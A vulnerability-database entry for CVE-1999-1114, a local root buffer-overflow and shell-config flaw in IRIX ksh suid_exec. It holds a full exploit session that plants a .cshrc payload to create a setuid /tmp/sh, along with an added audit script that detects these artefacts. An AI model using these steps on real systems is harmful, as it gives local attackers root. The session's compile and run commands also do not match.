IRIX Korn Shell (ksh) suid_exec Buffer Overflow Vulnerability

Vulnerability ID: 1105268    Vulnerability type: buffer overflow
Published: 1996-12-02    Updated: 2005-05-02
CVE ID: CVE-1999-1114    CNNVD ID: CNNVD-199804-011
Platform: IRIX    CVSS score: 7.2
|Vulnerability sources
https://www.exploit-db.com/exploits/19353
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199804-011
|Vulnerability details
The suid_exec program of the Korn shell (ksh) on IRIX 6.x, and possibly on other operating systems, contains a buffer overflow vulnerability. A local user can exploit it to obtain root privileges.
|Vulnerability exploit (EXP)
source: http://www.securityfocus.com/bid/467/info

A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with its Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root.


% setenv | grep SHELL
SHELL=/bin/tcsh
% mv ~/.cshrc ~/.cshrc.old
% cat > ~/.cshrc
cp /bin/sh /tmp
chmod a+rsx /tmp/sh
^D
% cat > expl.c
main()
{
execl("/sbin/suid_exec","/bin/su","/bin/su",0);
}
^D
% cc expl.c -o expl.c
% ./expl
Too many ('s.
% ls -l /tmp/sh
-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*
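A defender-side audit for the two artefacts the session above leaves behind: a setuid suid_exec helper still installed, and a setuid copy of a shell dropped into a temporary directory. This is an added example, not code from the BID entry or the SGI advisory; the /sbin/suid_exec path and the list of shell names are assumptions.

```shell
#!/bin/sh
# Added example (not from the advisory). Assumes POSIX sh, find(1) and test(1).

# is_setuid_mode MODESTR: true if an ls -l mode string carries the setuid bit,
# i.e. the 4th character (owner execute slot) is 's' or 'S'. The line
# "-r-sr-sr-x 1 root sys ... /tmp/sh" from the session above matches.
is_setuid_mode() {
    rest=${1#???}            # drop the type char and the owner r/w slots
    case $rest in
        s*|S*) return 0 ;;
        *)     return 1 ;;
    esac
}

# find_setuid_shells DIR...: list regular files below DIR with the setuid bit
# whose basename is a shell (assumed list). A hit such as /tmp/sh is the
# "cp /bin/sh /tmp; chmod a+rsx /tmp/sh" artefact from the .cshrc payload.
find_setuid_shells() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -xdev -type f -perm -4000 \
            \( -name sh -o -name csh -o -name tcsh -o -name ksh -o -name bash \) \
            2>/dev/null
    done
}

# check_suid_exec [PATH]: report whether the ksh suid_exec helper is present
# and setuid. Returns 0 = present and setuid, 1 = absent, 2 = present but
# not setuid. The default path /sbin/suid_exec is taken from the session above.
check_suid_exec() {
    p=${1:-/sbin/suid_exec}
    if [ ! -e "$p" ]; then
        echo "absent:      $p"; return 1
    fi
    if [ -u "$p" ]; then
        echo "SETUID:      $p"; return 0
    fi
    echo "not setuid:  $p"; return 2
}

# Typical run on a host: review the helper, then sweep the temp directories.
# check_suid_exec
# find_setuid_shells /tmp /var/tmp
```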
|References

Source: XF
Name: ksh-suid_exec(2100)
Link: http://xforce.iss.net/static/2100.php
Source: BID
Name: 467
Link: http://www.securityfocus.com/bid/467
Source: CIAC
Name: H-15A
Link: http://ciac.llnl.gov/ciac/bulletins/h-15a.shtml
Source: SGI
Name: 19980405-01-I
Link: ftp://patches.sgi.com/support/free/security/advisories/19980405-01-I
Source: AUSCERT
Name: AA-96.17
Link: ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-96.17.suid_exec.vul